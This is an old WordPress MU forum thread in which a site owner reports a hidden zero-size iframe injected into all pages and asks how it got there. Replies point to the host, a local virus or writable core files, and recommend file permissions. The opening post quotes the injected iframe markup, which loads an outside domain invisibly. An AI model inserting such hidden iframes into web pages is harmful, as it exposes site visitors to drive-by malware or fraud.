The MU forums have moved to WordPress.org

iframe in the header (9 posts)

1. indyword
    Posted 17 years ago #

hey everyone here
    i was working on developing a theme for my MU
    i was looking for the page loading status and i found the page is connecting to another site
    when i toke a look at the source from my explorer i found those two lines before the begining of the code of the index page
    and actually all the pages

'<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=manph marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
    <html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=manph marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>'

i searched in the code of the theme i was working on .. found nothing .. changed the theme and the code is still there
    i don't know what is that .. i looked at the site in the iframe i found just alexa thing with high rank .. just the alexa box

how did they access my site
    how did they put that code
    is this something in MU ?
    i changed the permissions in a new installation after drmike's advice after hacking of my index file with some stupid team of kids
    what's that going on here

2. redtor
    Posted 17 years ago #

see http://www.thaiwordpress.com
    and view sourcecode :) about iframe

3. indyword
    Posted 17 years ago #

still the same problem
    how did they put this iframe on the top of my MU ??

4. andrea_r
    Posted 17 years ago #

Your host maybe?

5. indyword
    Posted 17 years ago #

i will check this out with them
    i wish everything will be fine
    but as a quick reference
    which files they have to play with to put this code ?? i didn't find anything in themes used

6. drmike
    Posted 17 years ago #

Sounds like a possible virus issue to me on the OP's computer since the code isn't found in the themes.

7. pumpkinslayer
    Posted 17 years ago #

I had these strange iframes in mine once too. The actual code was not found in the themes, but in files like wp-settings.php or similar (it was a while ago, I can't remember exactly). In my case there was a virus warning that came up when my pages were loaded because of that iframe.

It was a case of those files having inappropriate access rights so that even a basic script would sniff around my site for files that could be written to and add their code in the first few lines of the file. Make sure files are 644 and directories are 755 (except for a few that need to be 777, like the uploads and cache directory).

8. indyword
    Posted 17 years ago #

permissions were fine for me..
    i will rebuild everything from the scratch again
    and will see

9. anigroove
    Posted 15 years ago #

and ?

About this Topic

• Started 17 years ago by indyword
  • Latest reply from anigroove